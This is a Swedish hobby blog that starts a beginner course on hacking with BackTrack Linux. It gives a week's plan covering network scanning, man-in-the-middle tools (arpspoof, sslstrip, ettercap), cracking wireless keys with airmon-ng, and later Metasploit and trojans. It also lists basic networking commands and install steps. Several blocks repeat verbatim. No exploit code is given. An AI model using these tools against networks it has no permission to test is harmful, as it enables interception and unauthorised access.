Torsdag: Lite allmän säkerhet som tillexempel hur du skyddar dig trådlös och hur du knäcker nätverksnycklar och använder dig av verktygen/programmen ovan. Vi kommer då använda oss av ett program som heter Airmon-ng
Fredag: Summering av veckan.
Lördag ledig så då kommer jag finnas för support/hjälp
Söndag: Kommer jag gå igenom nästa veckas planering. ( då jag kommer gå igenom metasploit och trojarer mm.)
Men eftersom ni hoppades på någonting så kommer jag skriva ner några kommandon och vad dom gör för er som vill fortsätta och så kan dom som ligger efter läsa det här när dom är klara.
Så vad behöver du för att komma igång?
Dom kommandona som jag skrev är absolut nödvändiga och är i största hand "Basic" och behövs när du startar upp backtrack.
( dom kommandona som jag skriver kör du i terminalen)
Hur kollar jag enkelt via terminalen att en sida är uppe?
Du kan pinga den genom att skriva Ping sen adressen eller ip:n (tex: ping www.google.se) och därefter får svar ifrån den.
Hur kollar jag min router/gateways ip i terminalen?
Route -n är kommandot för att kolla din gateway
Om jag vill kolla vilka vägar jag går när jag ska till google?
I windows skulle du skrivit "tracert sen adress" men i lbacktrack använder vi oss av ett kommando som heter "Traceroute" och fungerar nästan likadant som "tracert" .
Och för dom som är lite " bättre" och undrar varför jag skriver sånt som ovan är för att jag vill att en del ska få inblick i det vi kommer att hålla på med.
Frågor ställs i kommentarerna
Mvh/
Ninja :)
Så det första jag kommer göra är att hjälpa dom som behöver hjälp så dom inte kör fast.
jag la upp lite bilder nedanför det här inlägget då jag tror att några kommer behöva dom som hjälp.
skriv i kommentarerna det ni undrar över så ska jag tillägna den här dagen att hjälpa dom som behöver hjälp och sen gå vidare.
Liten planering av vad vi kommer gå igenom den här veckan som kommer
Imorgon kommer jag försöka vara lite ledig eftersom jag har fullt upp i skolan och har mycket annat som tar upp mycket tid. kommer dock finnas till för dom som vill ha hjälp och behöver det. (något inlägg kommer nog upp)
Måndag: Kommer vi gå igenom lite mera grunder och förhoppningsvis komma igång lite.
Tisdag: Då hade jag tänk gå igenom ett scanning program och förklara lite om det och gå igenom hur du spårar ip adresser och kollar runt nätverket (både lokalt och på andra ställen)
Onsdag: kommer då gå igenom vad begreppet "phising" är och gå igenom program så som arpspoof, sslstrip och ettercap
Torsdag: Lite allmän säkerhet som tillexempel hur du skyddar dig trådlös och hur du knäcker nätverksnycklar och använder dig av verktygen/programmen ovan. Vi kommer då använda oss av ett program som heter Airmon-ng
Fredag: Summering av veckan.
Lördag ledig så då kommer jag finnas för support/hjälp
Söndag: Kommer jag gå igenom nästa veckas planering. ( då jag kommer gå igenom metasploit och trojarer mm.)
Men eftersom ni hoppades på någonting så kommer jag skriva ner några kommandon och vad dom gör för er som vill fortsätta och så kan dom som ligger efter läsa det här när dom är klara.
Så vad behöver du för att komma igång?
Dom kommandona som jag skrev är absolut nödvändiga och är i största hand "Basic" och behövs när du startar upp backtrack.
( dom kommandona som jag skriver kör du i terminalen)
Hur kollar jag enkelt via terminalen att en sida är uppe?
Du kan pinga den genom att skriva Ping sen adressen eller ip:n (tex: ping www.google.se) och därefter får svar ifrån den.
Hur kollar jag min router/gateways ip i terminalen?
Route -n är kommandot för att kolla din gateway
Om jag vill kolla vilka vägar jag går när jag ska till google?
I windows skulle du skrivit "tracert sen adress" men i lbacktrack använder vi oss av ett kommando som heter "Traceroute" och fungerar nästan likadant som "tracert" .
Och för dom som är lite " bättre" och undrar varför jag skriver sånt som ovan är för att jag vill att en del ska få inblick i det vi kommer att hålla på med.
Frågor ställs i kommentarerna
Mvh/
Ninja :)
När kommer guiden att starta?
Har fullt upp för tillfället så kommer inte hinna påbörja den här än.
Den kommer dock idag men bara lite senare.. typ runt kl 3
Vill gärna skriva så utförligt som möjligt när det gäller det här så det är därför jag skickar ut den kl 3 så jag verkligen hinner gå igenom det här.
För er som har haft lite problem.
/etc/init.d/networking start är ett kommando för att väcka upp dina nätverksenheter.
Ifconfig är ett kommando för att kolla dina nätverksenheter och kan se om dom är uppe eller inte.
Vi tar för exempel att vi vill väcka det trådlösa kortet "wlan0" , då skriver vi "ifconfig wlan0 up" och om vi skulle vilja ha ner det igen så skriver vi "ifconfig wlan0 down".
Så nu inför mitt kommande inlägg så hoppas jag att ni får era os och hårdvara att fungera! skriv i kommentarerna om det är något jag kan hjälpa till med.
Frågor från kommentarerna:
Kan jag göra det här genom att använda skiva?
ja det kan du och det fungerar lika bra :) ( glöm in att byta boot ordning så du börjar från skivan när du startar datorn, det brukar vara så att du måste trycka någon knapp under uppstart, tex: "press any buttom to boot from cd" så missa inte det )
Mitt nätverskort fungerar inte trots att jag skrivit dina kommandon?
Kolla för säkerhetens skull att ditt nätverskort stöds och om du har rätt drivrutiner, och det kan inte vara så att ditt kort redan är vaknat men att den har ett annat namn bara?
Hur lång tid kommer den här guiden att hålla på?
Jag kommer till en start att hålla på under 3 veckors tid och sedan gå över till något mer avancerat.
Fick också en kommentar om att jag gör det här för reklamens skull vilket inte är sant då jag tar det här på fullt allvar och kommer satsa på att hålla igång den här sidan så lång tid jag kan.
Och för er som finner min blogg intressant hoppas jag kan njuta av följande inlägg i eftermidda.
MvH/
Ninja :)
Den kommer dock idag men bara lite senare.. typ runt kl 3
Vill gärna skriva så utförligt som möjligt när det gäller det här så det är därför jag skickar ut den kl 3 så jag verkligen hinner gå igenom det här.
För er som har haft lite problem.
/etc/init.d/networking start är ett kommando för att väcka upp dina nätverksenheter.
Ifconfig är ett kommando för att kolla dina nätverksenheter och kan se om dom är uppe eller inte.
Vi tar för exempel att vi vill väcka det trådlösa kortet "wlan0" , då skriver vi "ifconfig wlan0 up" och om vi skulle vilja ha ner det igen så skriver vi "ifconfig wlan0 down".
Så nu inför mitt kommande inlägg så hoppas jag att ni får era os och hårdvara att fungera! skriv i kommentarerna om det är något jag kan hjälpa till med.
Frågor från kommentarerna:
Kan jag göra det här genom att använda skiva?
ja det kan du och det fungerar lika bra :) ( glöm in att byta boot ordning så du börjar från skivan när du startar datorn, det brukar vara så att du måste trycka någon knapp under uppstart, tex: "press any buttom to boot from cd" så missa inte det )
Mitt nätverskort fungerar inte trots att jag skrivit dina kommandon?
Kolla för säkerhetens skull att ditt nätverskort stöds och om du har rätt drivrutiner, och det kan inte vara så att ditt kort redan är vaknat men att den har ett annat namn bara?
Hur lång tid kommer den här guiden att hålla på?
Jag kommer till en start att hålla på under 3 veckors tid och sedan gå över till något mer avancerat.
Fick också en kommentar om att jag gör det här för reklamens skull vilket inte är sant då jag tar det här på fullt allvar och kommer satsa på att hålla igång den här sidan så lång tid jag kan.
Och för er som finner min blogg intressant hoppas jag kan njuta av följande inlägg i eftermidda.
MvH/
Ninja :)
fredag 1 april 2011
Inför guiden som startar imorgon!
Jag vill att samtliga som kommer följa den här bloggen ska kunna ha tillgång till Backtrack 4 r2
http://www.backtrack-linux.org/
Det är en linux distribution som riktar sig mot säkerthet i första hand.
Det finns flera nödvändiga program där så du slipper hämta dom eller krångla med något.
Om du är på en annan linux distribution så som Ubuntu eller liknande går det lika bra också.
Ett bra tips för dig som ska installera backtrack! (andra kan skippa det!)
Du kan använda dig av ett usb för att installera det.
*Först behöver du minst ett 2 gig minne
*sen formaterar du den som FAT32 (högerklicka på enheten och tryck på formatera) * notera att det tar bort all information på stickan.
* Hämta och installera programment http://unetbootin.sourceforge.net/ som du kommer använde dig av.
* Hämta nyaste utgåvan av backtrack som du hittar på deras hemsida (http://www.backtrack-linux.org)
* öppna programment unetbootin och välj Backtrack.iso filen för att sedan påbörja installationen
När du sedan startar om datorn så ska du ha usb minnet in pluggat i datorn och boota ifrån den.
( du kan ändra vilken enhet datorn ska boota ifrån i bios, du går in i bios genom att klicka på bios knappen när du startar upp datorn, för mig är det tillexempel f1)
För er som sitter på ubuntu!
Ni kommer behöva följande program till en början.
* airmon-ng ( apt-get install airmon-ng)
* ettercap ( apt-get install ettercap, kan också vara apt-get install ettercap.gtk om jag minns rätt)
* Arpspoof
* Ssltrip (http://www.thoughtcrime.org/software/sslstrip/ )
* macchanger (apt-get install macchanger)
* Nmap (apt-get install nmap)
Bara till en början så återkommer med flera imorgon.
Om du är på Backtrack så behöver du diverse information för att börja.
När du startar upp den första gången efter du installerat själva operativsystemet så kommer ditt användarnamn vara "root" och lösenordet "toor" sen efter det ska du skriva "Startx" för att starta det.
För att starta nätverket så går du in i terminalen och skriver /etc/init.d/networking start för att starta din nätverksenheter.
Sen är det bra om du skriver /etc/init.d/wicd start vilket startar din nätverkshanterare (som kan nås vid menyn)
Nu kan du surfa och ha kontakt med nätet.
Det här är mest bara en förberedning till vad jag kommer börja med och jag kommer öka tempot vart eftersom.
Frågor? skriv i kommentarerna.
Är det något du behöver hjälp med? eller är det något du inte förstår riktigt? kom med förslag så kan jag ta upp dom i nästa inlägg.
Jag har fått en del förslag om videobloggar om det här och jag kommer göra det så småningom, om ni har något förslag på vad jag ska lära er/dig så skriv i kommentarerna :)
MvH/
Ninja
http://www.backtrack-linux.org/
Det är en linux distribution som riktar sig mot säkerthet i första hand.
Det finns flera nödvändiga program där så du slipper hämta dom eller krångla med något.
Om du är på en annan linux distribution så som Ubuntu eller liknande går det lika bra också.
Ett bra tips för dig som ska installera backtrack! (andra kan skippa det!)
Du kan använda dig av ett usb för att installera det.
*Först behöver du minst ett 2 gig minne
*sen formaterar du den som FAT32 (högerklicka på enheten och tryck på formatera) * notera att det tar bort all information på stickan.
* Hämta och installera programment http://unetbootin.sourceforge.net/ som du kommer använde dig av.
* Hämta nyaste utgåvan av backtrack som du hittar på deras hemsida (http://www.backtrack-linux.org)
* öppna programment unetbootin och välj Backtrack.iso filen för att sedan påbörja installationen
När du sedan startar om datorn så ska du ha usb minnet in pluggat i datorn och boota ifrån den.
( du kan ändra vilken enhet datorn ska boota ifrån i bios, du går in i bios genom att klicka på bios knappen när du startar upp datorn, för mig är det tillexempel f1)
För er som sitter på ubuntu!
Ni kommer behöva följande program till en början.
* airmon-ng ( apt-get install airmon-ng)
* ettercap ( apt-get install ettercap, kan också vara apt-get install ettercap.gtk om jag minns rätt)
* Arpspoof
* Ssltrip (http://www.thoughtcrime.org/software/sslstrip/ )
* macchanger (apt-get install macchanger)
* Nmap (apt-get install nmap)
Bara till en början så återkommer med flera imorgon.
Om du är på Backtrack så behöver du diverse information för att börja.
När du startar upp den första gången efter du installerat själva operativsystemet så kommer ditt användarnamn vara "root" och lösenordet "toor" sen efter det ska du skriva "Startx" för att starta det.
För att starta nätverket så går du in i terminalen och skriver /etc/init.d/networking start för att starta din nätverksenheter.
Sen är det bra om du skriver /etc/init.d/wicd start vilket startar din nätverkshanterare (som kan nås vid menyn)
Nu kan du surfa och ha kontakt med nätet.
Det här är mest bara en förberedning till vad jag kommer börja med och jag kommer öka tempot vart eftersom.
Frågor? skriv i kommentarerna.
Är det något du behöver hjälp med? eller är det något du inte förstår riktigt? kom med förslag så kan jag ta upp dom i nästa inlägg.
Jag har fått en del förslag om videobloggar om det här och jag kommer göra det så småningom, om ni har något förslag på vad jag ska lära er/dig så skriv i kommentarerna :)
MvH/
Ninja
Prenumerera på:
Inlägg (Atom)